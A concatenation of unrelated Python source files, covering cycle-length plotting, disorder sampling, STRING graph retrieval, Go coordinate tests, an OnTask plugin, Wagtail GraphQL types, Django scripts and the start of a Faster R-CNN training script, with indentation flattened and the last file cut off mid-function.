cycle_stats_exclude_flagged: pandas dataframe for users after removing excluded flags, with information about user's cycle statistics
save_dir: path where to save plot
Output:
None
'''
my_bins=np.arange(min(cycle_stats['max_inter_cycle_length']), max(cycle_stats['max_inter_cycle_length']) + 1)
plt.hist(cycle_stats['max_inter_cycle_length'], bins=my_bins, label='With behaviorally-tainted cycles', color='blue', histtype='step')
plt.hist(cycle_stats_exclude_flagged['max_inter_cycle_length'], bins=my_bins, label='Excluding behaviorally-tainted cycles', color='red', histtype='step')
plt.autoscale(enable=True, tight=True, axis='x')
plt.ylim(0,38000)
plt.xlabel('Maximum CLD in days')
plt.ylabel('User count with maximum CLD')
plt.savefig('{}/hist_max_inter_cycle_length_with_and_without_excluded_flags.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
# Plot for median Vs max intercycle length (i.e., CLD) histogram
def plot_median_vs_max_intercycle_length(cycle_stats, save_dir):
'''
Function that plots median Vs max inter cycle length (CLD) 2D scatter histogram
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
save_dir: path where to save plot
Output:
None
'''
plt.hist2d(cycle_stats['median_inter_cycle_length'], cycle_stats['max_inter_cycle_length'], bins=(75, 75), cmap='jet', norm=colors.LogNorm())
plt.autoscale(enable=True, tight=True)
range_vals_median = np.linspace(min(cycle_stats['median_inter_cycle_length']), max(cycle_stats['median_inter_cycle_length']), 100)
plt.plot(range_vals_median, range_vals_median+10, label='Median CLD + 10', color='red')
plt.xlabel('Median CLD')
plt.ylabel('Maximum CLD')
plt.xlim((0,75))
plt.ylim((0, 75))
plt.colorbar()
plt.savefig('{}/median_vs_max_scatter_2d_hist.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
# Plot for median intercycle length (i.e., CLD) histogram
def plot_median_CLD_hist(cycle_stats, pdf_or_cdf, save_dir):
'''
Function that plots median CLD histograms
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Median CLD histogram
my_bins=np.arange(cycle_stats['median_inter_cycle_length'].dropna().min(),cycle_stats['median_inter_cycle_length'].dropna().max()+1)
all_counts, all_bins = np.histogram(cycle_stats['median_inter_cycle_length'].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Median CLD = n)'
cohort_filename = '{}/median_CLD_pdf_cohort.pdf'.format(save_dir)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Median CLD $\leq$ n)'
cohort_filename = '{}/median_CLD_cdf_cohort.pdf'.format(save_dir)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Actual plot
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xlabel('Median CLD in days')
plt.ylabel(y_label)
plt.grid(True)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
################################## MAIN ############################
def main():
'''
Main function of the script that runs the cycle and period length related analysis
Input:
None
Output:
None
'''
### Directories
data_dir='../data'
preprocessed_data_dir='../preprocessed_data'
results_dir = '../results/characterizing_cycle_and_symptoms/cycle_period_length_analysis'
os.makedirs(results_dir, exist_ok = True)
################# SYMPTOMS TRACKED #################
# Tracking
with open('{}/tracking_enriched.pickle'.format(data_dir), 'rb') as f:
tracking = pickle.load(f)
print('Tracking-data loaded')
################# CYCLES #################
with open('{}/cohort_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycle_stats = pickle.load(f)
# Cycles flagged
with open('{}/cohort_cycles_flagged.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycles_flagged = pickle.load(f)
# Exclude cycles flagged as badly tracked
cohort_cycles = cohort_cycles_flagged[cohort_cycles_flagged['badly_tracked_cycle'] == 'f']
# Cycles stats
with open('{}/cohort_clean_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_clean_cycle_stats = pickle.load(f)
print('Cycles-data loaded')
################# PLOTTING #################
#### PLOT histogram of max intercycle length, with and without excluding flagged cycles
plot_max_intercycle_length_hists(cohort_cycle_stats, cohort_clean_cycle_stats, results_dir)
#### PLOT Median Vs Max CLD 2D histogram
plot_median_vs_max_intercycle_length(cohort_clean_cycle_stats, results_dir)
#### PLOT Median CLD histogram
plot_median_CLD_hist(cohort_clean_cycle_stats, 'cdf', results_dir)
#### PLOT cycle and period length histograms: pdf
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
#### Bootstrapped-KS cycle and period length
bootstrapped_cycle_period_lengths_KS(cohort_clean_cycle_stats, cohort_cycles, 'median_inter_cycle_length', 9, 100000, results_dir)
#### PLOT average cycle and average length over cycle-id
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, results_dir)
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, results_dir)
#### PLOT random cycle length time-series
random_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, results_dir)
#### PLOT population level cycle and period length time-series
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'period_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
# Making sure the main program is not executed when the module is imported
if __name__ == '__main__':
# Just run the main
main()
|
# coding: utf-8
#
# This code is part of cmpy.
#
# Copyright (c) 2022, Dylan Jones
"""This module contains methods for modeling disorder."""
import numpy as np
from typing import Union, Sequence
def create_subst_array(
size: int, values: Sequence[float], conc: Union[float, Sequence[float]]
) -> np.ndarray:
"""Creates an (ordered) array of values.
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values for filling the array. The size must match the size of the
concentrations. If one concentration is given the value-array must be of size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
Returns
-------
array : np.ndarray
The (ordered) array filled with the given values.
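Examples
--------
A minimal illustration (values and concentrations are arbitrary):
>>> create_subst_array(5, values=[0, 1], conc=[0.4, 0.6])
array([0, 0, 1, 1, 1])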
"""
# Get sizes of sub-arrays
if isinstance(conc, float):
conc = [conc, 1 - conc]
if sum(conc) != 1:
raise ValueError("Fractions have to add up to 1!")
sizes = (size * np.array(conc)).astype(np.int64)
sizes[-1] += size - sum(sizes)
# create sub-arrays
arrays = [np.full(size, val) for size, val in zip(sizes, values)]
return np.concatenate(arrays)
def random_permutations(
arr: Sequence[float], size: int, replace: bool = False, seed: int = None
):
"""Creates (optionally unique) permutations of a given array.
Parameters
----------
arr : (N) np.ndarray
The input array to permute.
size : int
The number of permutations to generate.
replace : bool, optional
If `False`, only unique permutations are returned. The default is `False`.
seed : int, optional
An optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The permuted array.
Examples
--------
>>> a = [0, 0, 1, 1, 1]
>>> perm = random_permutations(a, size=2, seed=0)
>>> next(perm)
array([1, 1, 1, 0, 0])
>>> next(perm)
array([0, 1, 1, 1, 0])
"""
rng = np.random.default_rng(seed)
p = np.array(arr)
seen = set()
count = 0
while True:
if count >= size:
break
rng.shuffle(p)
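# When replace is False, permutations already seen are skipped (tracked by hashing the raw array bytes)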
if not replace:
phash = hash(p.data.tobytes())
if phash not in seen:
seen.add(phash)
yield p
count += 1
else:
yield p
count += 1
def disorder_generator(
size: int,
values: Sequence[float],
conc: Union[float, Sequence[float]],
samples: int,
replace: bool = False,
seed=None,
):
"""Generates (optionally unique) random samples from a given 1-D array.
See Also
--------
random_permutations
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values for filling the array. The size must match the size of the
concentrations. If one concentration is given the value-array must be of size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
samples : int
The number of random arrays to generate.
replace : bool, optional
If `False`, only unique permutations are returned. The default is `False`.
seed : int, optional
An optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The randomly sampled arrays.
Examples
--------
>>> eps = disorder_generator(5, values=[0, +1], conc=[0.4, 0.6], samples=2, seed=0)
>>> next(eps)
array([1, 1, 1, 0, 0])
>>> next(eps)
array([0, 1, 1, 1, 0])
"""
ordered = create_subst_array(size, values, conc)
return random_permutations(ordered, samples, replace, seed)
|
"""
This file offers the methods to automatically retrieve the graph Sphingomonas hankookensis.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def SphingomonasHankookensis(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Sphingomonas hankookensis graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Whether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Whether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs/string"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instance of Sphingomonas hankookensis graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="SphingomonasHankookensis",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy
import coords
import go
from tests import test_utils
class TestCoords(test_utils.MiniGoUnitTest):
def test_upperleft(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.unflatten_coords(0), (0, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((1,9)), (0, 0))
self.assertEqual(coords.unparse_sgf_coords((0, 0)), 'aa')
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.to_human_coord((0, 0)), 'A9')
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
def test_topleft(self):
self.assertEqual(coords.parse_sgf_coords('ia'), (0, 8))
self.assertEqual(coords.unflatten_coords(8), (0, 8))
self.assertEqual(coords.parse_kgs_coords('J9'), (0, 8))
self.assertEqual(coords.parse_pygtp_coords((9,9)), (0, 8))
self.assertEqual(coords.unparse_sgf_coords((0, 8)), 'ia')
self.assertEqual(coords.flatten_coords((0, 8)), 8)
self.assertEqual(coords.to_human_coord((0, 8)), 'J9')
self.assertEqual(coords.unparse_pygtp_coords((0, 8)), (9, 9))
def test_pass(self):
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unflatten_coords(81), None)
self.assertEqual(coords.parse_kgs_coords('pass'), None)
self.assertEqual(coords.parse_pygtp_coords((0,0)), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(coords.flatten_coords(None), 81)
self.assertEqual(coords.to_human_coord(None), 'pass')
self.assertEqual(coords.unparse_pygtp_coords(None), (0, 0))
def test_parsing_9x9(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.parse_sgf_coords('ac'), (2, 0))
self.assertEqual(coords.parse_sgf_coords('ca'), (0, 2))
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(
'aa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('aa')))
self.assertEqual(
'sa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('sa')))
self.assertEqual(
(1, 17),
coords.parse_sgf_coords(coords.unparse_sgf_coords((1, 17))))
self.assertEqual(coords.parse_kgs_coords('A1'), (8, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_kgs_coords('C2'), (7, 2))
self.assertEqual(coords.parse_kgs_coords('J2'), (7, 8))
self.assertEqual(coords.parse_pygtp_coords((1, 1)), (8, 0))
self.assertEqual(coords.parse_pygtp_coords((1, 9)), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((3, 2)), (7, 2))
self.assertEqual(coords.unparse_pygtp_coords((8, 0)), (1, 1))
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
self.assertEqual(coords.unparse_pygtp_coords((7, 2)), (3, 2))
self.assertEqual(coords.to_human_coord((0,8)), 'J9')
self.assertEqual(coords.to_human_coord((8,0)), 'A1')
def test_flatten(self):
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.flatten_coords((0, 3)), 3)
self.assertEqual(coords.flatten_coords((3, 0)), 27)
self.assertEqual(coords.unflatten_coords(27), (3, 0))
self.assertEqual(coords.unflatten_coords(10), (1, 1))
self.assertEqual(coords.unflatten_coords(80), (8, 8))
self.assertEqual(coords.flatten_coords(coords.unflatten_coords(10)), 10)
self.assertEqual(coords.unflatten_coords(coords.flatten_coords((5, 4))), (5, 4))
def test_unflatten_coords_ndindex_equivalence(self):
ndindices = list(numpy.ndindex(go.N, go.N))
flat_coords = list(range(go.N * go.N))
self.assertEqual(list(map(coords.unflatten_coords, flat_coords)), ndindices)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import pandas as pd
# The field class_name contains the name of the class to load to execute the
# plugin.
class_name = 'OntaskTestPlugin'
class OntaskTestPlugin(object):
"""
Example of a class that implements the OnTask plugin interface. The
objects of this class have to provide the following elements:
1. name: Plugin name show to the users.
2. description_txt: A string with the detailed description of what the
plugin does
3. input_column_names: A potentially empty list of column names (strings).
If the list is empty, the columns are selected by the user at execution
time.
4. output_column_names: Non empty list of names (strings) of the columns
to be used for the output of the transformation.
5. parameters: an optionally empty list with tuples with the following
structure:
('name', type, [list of allowed values], initial value, help_text)
These elements will be requested from the user before executing the
plugin through a form. The conditions on these values are:
- name must be a string
- type must be a string equal to "integer", "double", "string",
"datetime" or "boolean".
- The list of values restricts the possible values
- The initial value must be of the type specified by the second
element.
- help_text: a string to show as help text
6. method "run" that receives:
- a pandas data frame with the data to process
- a string with the name of the key column that will be used to merge
the result.
- A dictionary of pairs (name, value) with the parameters described in
the previous element.
and returns a result Pandas data frame. This frame **must** have one
column with the key column name provided so that it can be properly
merged with the existing data.
"""
def __init__(self):
self.name = 'Test Plungin 2 Name'
self.description_txt = 'Test Plugin 2 Description Text'
self.input_column_names = ['A1', 'A2']
self.output_column_names = ['RESULT 3', 'RESULT 4']
self.parameters = [
('param string', 'string', ['v1', 'v2'], 'v1', 'help param string'),
('param integer', 'integer', [], None, 'help param integer'),
('param double', 'double', [1.2, 2.2, 3.2], None,
'help param double'),
('param boolean', 'boolean', [], True, 'help param boolean'),
('param datetime', 'datetime', [], '2018-05-25 18:03:00+09:30',
'help param datetime'),
('param datetime2', 'datetime',
[],
'2018-05-25 18:03:00+09:30',
'help param datetime'),
]
def run(self, data_frame, merge_key, parameters=None):
"""
Method to overwrite. Receives a data frame with a number of columns
stipulated by the num_column_input pair, the name of a key column and a
dictionary with parameters of the form name, value.
Runs the algorithm and returns a pandas data frame structure that is
merged with the existing data frame in the workflow using the merge_key.
:param data_frame: Input data for the plugin
:param merge_key: Name of the column key that will be used for merging
:param parameters: Dictionary with (name, value) pairs.
:return: a Pandas data_frame to merge with the existing one (must
contain a column with name merge_key)
"""
# Extract the key column from the given data frame
result = pd.DataFrame(data_frame[merge_key])
# Process the given data and create the result
result[self.output_column_names[0]] = \
data_frame[self.input_column_names[0]] + \
data_frame[self.input_column_names[1]]
result[self.output_column_names[1]] = \
data_frame[self.input_column_names[0]] - \
data_frame[self.input_column_names[1]]
return result
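# A minimal usage sketch (illustrative only; the key column and data values below are
# made up and are not part of the OnTask plugin interface).
if __name__ == '__main__':
demo_df = pd.DataFrame({'key': [1, 2], 'A1': [10, 20], 'A2': [3, 5]})
plugin = OntaskTestPlugin()
print(plugin.run(demo_df, merge_key='key', parameters={}))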
|
import dataclasses
from typing import Any, Callable, List, Optional, Type
from wagtail.core.blocks.field_block import CharBlock, FieldBlock, RichTextBlock
from wagtail.core.blocks.stream_block import StreamBlock
from wagtail.core.fields import StreamField
from wagtail.images.blocks import ImageChooserBlock
import strawberry
import strawberry.django
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from .scalars import HTML
def _make_type(
class_name: str, value_field_name: str, value_type: Type, from_data: Callable
) -> Type:
# TODO: don't use dataclasses
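# Dynamically builds a Strawberry type named class_name with an `id` field and a single
# value field, attaching `from_data` as an alternate constructor.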
x = dataclasses.make_dataclass(
class_name, [("id", strawberry.ID), (value_field_name, value_type)]
)
x.from_data = classmethod(from_data)
return strawberry.type(x)
def get_type_for_stream_block(
block: StreamBlock,
class_name: str,
) -> Type:
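# Build one Strawberry type per child block, expose them as a union, and keep a
# block-name -> type map (_block_map) for resolving raw stream data later.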
types = set()
block_map = {}
for field_block in block.child_blocks.values():
name = class_name + capitalize_first(to_camel_case(field_block.name))
type_ = _get_type_for_field_block(field_block, name)
if isinstance(type_, StrawberryUnion):
assert type_.graphql_name
type_.graphql_name += "Values"
type_ = _make_type(name, "values", List[type_], None)
block_map[field_block.name] = type_
types.add(type_)
union_type = strawberry.union(
class_name, types=tuple(sorted(types, key=lambda x: str(x)))
)
union_type._block_map = block_map
return union_type
def _get_type_for_field_block(field_block: FieldBlock, name: str) -> Optional[Type]:
type_ = None
if isinstance(field_block, CharBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], value=data["value"])
type_ = _make_type(name, "value", str, from_data)
elif isinstance(field_block, RichTextBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], html=data["value"])
type_ = _make_type(name, "html", HTML, from_data)
elif isinstance(field_block, ImageChooserBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], image=data["value"])
type_ = _make_type(name, "image", str, from_data)
elif isinstance(field_block, StreamBlock):
type_ = get_type_for_stream_block(field_block, name)
if type_ is None:
raise ValueError(f"Unknown type for {field_block}")
type_._origin_field_block = field_block # type: ignore
return type_
def _get_block(block: dict, parent_type: Type) -> Any:
block_type = parent_type._block_map.get(block["type"])
if not block_type:
return None
block_data = block.copy()
block_data.pop("type")
if type(block["value"]) is list:
# mmm
print("🌼🌼🌼")
print(block_type._type_definition.fields[1].__dict__)
block_value_type = block_type._type_definition.fields[1].type.of_type
value = [
_get_block(sub_block, block_value_type) for sub_block in block["value"]
]
print(block_type)
print(block_value_type)
print(value)
return block_type(id=block_data["id"], values=value)
return block_type.from_data(block_data)
def get_resolver_for_stream_field(field: StreamField, type: Type) -> Callable:
def _resolver(root: Any) -> List[type]:
raw_data = getattr(root, field.name)._raw_data
data = []
for block in raw_data:
block_data = _get_block(block, type)
if block_data:
data.append(block_data)
return data
return _resolver
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "irs990.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
import django
import json
import os
import sys
# Make sure we can see the parent directory to import
sys.path.append('../')
os.environ['DJANGO_SETTINGS_MODULE'] = 'shipwrecks.settings'
# Make sure Django is set up
django.setup()
# Now we can import our Django model(s)
from wrecks.models import Wreck
from wrecks.models import WreckType
from wrecks.models import SOURCE_CHOICES
# Import the GEOS library needed to create points
from django.contrib.gis.geos import Point
from django.contrib.gis.geos import GEOSGeometry
if __name__ == '__main__':
# Make sure we have specified a file to import
if len(sys.argv) < 2:
print('You must specify a geojson file to import.')
print('Usage: $ python import.py <geojson file>')
sys.exit()
# Open the GeoJSON file
json_filepath = sys.argv[-1]
try:
with open(json_filepath, 'r') as f:
data = json.loads(f.read())
except IOError:
sys.exit("Error opening GeoJSON file")
except ValueError:
sys.exit('Error: the file does not appear to be valid JSON.')
# Turn each feature into a Wreck model instance
for feature_dict in data['features']:
wreck = Wreck()
properties = feature_dict['properties']
# Figure out the source type
source_name = properties['source']
if source_name == 'enc_wrecks':
source = SOURCE_CHOICES[1][0]
else:
source = SOURCE_CHOICES[0][0]
# Figure out if the wreck type exists (and normalize the values)
wreck_type_value = properties['feature_type']
if not wreck_type_value:
wreck_type_value = 'Unknown'
else:
if wreck_type_value.startswith('Wrecks -'):
wreck_type_value = wreck_type_value.replace('Wrecks -', 'Wreck -')
wreck_type, created = WreckType.objects.get_or_create(name=wreck_type_value)
# Figure out the depth
if source_name == 'enc_wrecks':
# ENC Wrecks are always in meters
try:
depth_meters = float(properties['depth'])
except ValueError:
depth_meters = None
else:
if not properties['depth']:
depth_meters = None
else:
depth_value = properties['depth']
sounding = properties['sounding']
if 'meters' in sounding:
depth_meters = depth_value
elif 'feet' in sounding:
# Convert feet and tenths to meters
depth_meters = depth_value * 0.3048
elif 'fathoms' in sounding:
# Convert fathoms to meters
depth_meters = depth_value * 1.8288
else:
depth_meters = None
# Create the Point object from the lat and long
lat = feature_dict['geometry']['coordinates'][1]
lng = feature_dict['geometry']['coordinates'][0]
location_point = GEOSGeometry('POINT(%f %f)' % (lng, lat), srid=4269)  # NAD83; SRID must be an integer
# Get the name or assign 'unknown'
vessel_name = properties['vessel_name']
if not vessel_name:
vessel_name = 'Unknown'
# Cast the year sunk into an integer
try:
year_sunk = int(properties['yearsunk'])
except ValueError:
year_sunk = None
wreck.name = vessel_name
wreck.history = properties['history']
wreck.wreck_type = wreck_type
wreck.year_sunk = year_sunk
wreck.source = source
wreck.source_identifier = feature_dict['id']
wreck.depth_meters = depth_meters
wreck.location = location_point
# Save the new wreck
wreck.save()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: train.py
import argparse
import itertools
import numpy as np
import os
import shutil
import cv2
import six
assert six.PY3, "FasterRCNN requires Python 3!"
import tensorflow as tf
import tqdm
import tensorpack.utils.viz as tpviz
from tensorpack import *
from tensorpack.tfutils import optimizer, collect_env_info
from tensorpack.tfutils.common import get_tf_version_tuple
from tensorpack.tfutils.summary import add_moving_summary
import model_frcnn
import model_mrcnn
from basemodel import image_preprocess, resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from dataset import DetectionDataset
from config import finalize_configs, config as cfg
from data import get_all_anchors, get_all_anchors_fpn, get_eval_dataflow, get_train_dataflow
from eval import DetectionResult, predict_image, multithread_predict_dataflow, EvalCallback
from model_box import RPNAnchors, clip_boxes, crop_and_resize, roi_align
from model_cascade import CascadeRCNNHead
from model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses
from model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, sample_fast_rcnn_targets
from model_mrcnn import maskrcnn_loss, maskrcnn_upXconv_head
from model_rpn import generate_rpn_proposals, rpn_head, rpn_losses
from viz import draw_annotation, draw_final_outputs, draw_predictions, draw_proposal_recall
try:
import horovod.tensorflow as hvd
except ImportError:
pass
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
# The learning rate in the config is set for 8 GPUs, and we use trainers with average=False.
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
def get_inference_tensor_names(self):
"""
Returns two lists of tensor names to be used to create an inference callable.
Returns:
[str]: input names
[str]: output names
"""
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
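# Pipeline: preprocess image -> backbone features -> RPN proposals -> RoI heads;
# in training, the RPN, head and weight-decay losses are summed into 'total_cost'.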
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image']) # 1CHW
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs) # inputs?
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR), tf.int32, 'anchor_labels'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR, 4), tf.float32, 'anchor_boxes'),
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')] # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:] # h,w
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # fHxfWxNAx4, floatbox
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
# sample proposal boxes in training
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
# The boxes to be used to crop RoIs.
# Use all proposal boxes in inference
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1]) # nxcx7x7
# Keep C5 feature to be shared with mask branch
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
